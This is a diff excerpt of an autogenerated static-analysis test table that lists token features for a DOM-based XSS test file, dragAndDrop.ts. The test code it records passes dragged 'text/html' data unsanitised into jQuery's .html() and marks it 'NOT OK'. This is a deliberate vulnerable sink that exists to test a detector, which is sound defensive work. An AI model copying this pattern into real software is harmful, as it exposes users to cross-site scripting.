autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:23:34:23:34 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:9 | $ | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:9 | $ | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:9 | $ | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:9 | $ | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:9 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | $("#id") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | $("#id") | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | $("#id") | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | $("#id") | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | exceptional return of $("#id") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | exceptional return of $("#id") | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | exceptional return of $("#id") | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:16 | exceptional return of $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:21 | $("#id").html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:21 | $("#id").html | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:21 | $("#id").html | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:21 | $("#id").html | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:21 | $("#id").html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | $("#id" ... html')) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | $("#id" ... html')) | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | $("#id" ... html')) | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | $("#id" ... html')) | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | $("#id" ... html')) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | exceptional return of $("#id" ... html')) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | exceptional return of $("#id" ... html')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | exceptional return of $("#id" ... html')) | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | exceptional return of $("#id" ... html')) | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:9:24:58 | exceptional return of $("#id" ... html')) | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:11:24:15 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:11:24:15 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:11:24:15 | "#id" | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13441,6 +99806,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:11:24:15 | "#id" | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:11:24:15 | "#id" | enclosingFunctionName | install | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:11:24:15 | "#id" | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:18:24:21 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:18:24:21 | html | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:18:24:21 | html | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:18:24:21 | html | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:18:24:21 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:23 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:23 | e | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:23 | e | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:23 | e | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:23 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:36 | e.dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:36 | e.dataTransfer | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:36 | e.dataTransfer | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:36 | e.dataTransfer | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:36 | e.dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:44 | e.dataT ... getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:44 | e.dataT ... getData | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:44 | e.dataT ... getData | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:44 | e.dataT ... getData | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:44 | e.dataT ... getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13448,6 +99833,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | enclosingFunctionName | install | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | exceptional return of e.dataT ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | exceptional return of e.dataT ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | exceptional return of e.dataT ... /html') | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | exceptional return of e.dataT ... /html') | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:23:24:57 | exceptional return of e.dataT ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:25:24:36 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:25:24:36 | dataTransfer | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:25:24:36 | dataTransfer | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:25:24:36 | dataTransfer | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:25:24:36 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:38:24:44 | getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:38:24:44 | getData | contextSurroundingFunctionParameters | (el)\n(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:38:24:44 | getData | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:38:24:44 | getData | enclosingFunctionName | install | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:38:24:44 | getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:46:24:56 | 'text/html' | CalleeFlexibleAccessPath | e.dataTransfer.getData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:46:24:56 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:46:24:56 | 'text/html' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13455,18 +99855,88 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:46:24:56 | 'text/html' | enclosingFunctionBody | el HTMLElement el addEventListener drop e $ #id html e dataTransfer getData text/html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:46:24:56 | 'text/html' | enclosingFunctionName | install | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:24:46:24:56 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:28:8 | document | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:28:8 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:28:8 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:28:25 | documen ... istener | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:28:25 | documen ... istener | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:28:25 | documen ... istener | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:30:2 | documen ... T OK\\n}) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:30:2 | documen ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:30:2 | documen ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:30:2 | exceptional return of documen ... T OK\\n}) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:30:2 | exceptional return of documen ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:1:30:2 | exceptional return of documen ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:10:28:25 | addEventListener | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:10:28:25 | addEventListener | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:10:28:25 | addEventListener | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:27:28:32 | 'drop' | CalleeFlexibleAccessPath | document.addEventListener | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:27:28:32 | 'drop' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:27:28:32 | 'drop' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:27:28:32 | 'drop' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:27:28:32 | 'drop' | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:27:28:32 | 'drop' | receiverName | document | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | 'arguments' object of anonymous function | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | 'arguments' object of anonymous function | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | 'arguments' object of anonymous function | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | (e) => ... OT OK\\n} | CalleeFlexibleAccessPath | document.addEventListener | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | (e) => ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | (e) => ... OT OK\\n} | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | (e) => ... OT OK\\n} | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | (e) => ... OT OK\\n} | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | (e) => ... OT OK\\n} | receiverName | document | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | exceptional return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | exceptional return of anonymous function | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | exceptional return of anonymous function | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | return of anonymous function | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | return of anonymous function | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | return of anonymous function | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:35:30:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:28:36:28:36 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:5 | $ | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:5 | $ | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:5 | $ | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:5 | $ | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | $("#id") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | $("#id") | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | $("#id") | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | $("#id") | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | exceptional return of $("#id") | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | exceptional return of $("#id") | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | exceptional return of $("#id") | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:12 | exceptional return of $("#id") | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:17 | $("#id").html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:17 | $("#id").html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:17 | $("#id").html | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:17 | $("#id").html | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:17 | $("#id").html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | $("#id" ... html')) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | $("#id" ... html')) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | $("#id" ... html')) | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | $("#id" ... html')) | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | $("#id" ... html')) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | exceptional return of $("#id" ... html')) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | exceptional return of $("#id" ... html')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | exceptional return of $("#id" ... html')) | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | exceptional return of $("#id" ... html')) | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:5:29:54 | exceptional return of $("#id" ... html')) | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:7:29:11 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:7:29:11 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:7:29:11 | "#id" | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13474,6 +99944,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:7:29:11 | "#id" | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:7:29:11 | "#id" | enclosingFunctionName | document.addEventListener#functionalargument | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:7:29:11 | "#id" | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:14:29:17 | html | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:14:29:17 | html | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:14:29:17 | html | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:14:29:17 | html | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:14:29:17 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:19 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:19 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:19 | e | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:19 | e | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:19 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:32 | e.dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:32 | e.dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:32 | e.dataTransfer | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:32 | e.dataTransfer | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:32 | e.dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:40 | e.dataT ... getData | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:40 | e.dataT ... getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:40 | e.dataT ... getData | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:40 | e.dataT ... getData | enclosingFunctionName | document.addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:40 | e.dataT ... getData | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13481,6 +99971,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | enclosingFunctionBody | e $ #id html e dataTransfer getData text/html | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | enclosingFunctionName | document.addEventListener#functionalargument | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:29:19:29:53 | exceptional return of e.dataT ... /html') | contextFunctionInterfaces | 